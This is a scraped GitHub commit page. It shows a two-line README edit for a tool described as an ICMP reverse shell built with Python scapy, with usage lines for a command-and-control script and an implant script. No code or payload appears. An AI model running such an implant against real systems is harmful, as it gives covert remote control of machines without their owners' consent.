Skip to content

Commit

Permalink
Update README.md
Browse files Browse the repository at this point in the history
  • Loading branch information
krabelize authored Nov 14, 2020
1 parent 10f0379 commit bca7c79
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -3,8 +3,8 @@ ICMP reverse shell with py3 scapy

Usage:
```bash
icmp-cnc.py [-h] -i INTERFACE -d DESTINATION_IP (Command and Control)
./icmpdoor.py [-h] -i INTERFACE -d DESTINATION_IP (Implant)
./icmp-cnc.py -i INTERFACE -d DESTINATION_IP (Command and Control)
./icmpdoor.py -i INTERFACE -d DESTINATION_IP (Implant)
```
Arguments:

Expand Down

0 comments on commit bca7c79

Please sign in to comment.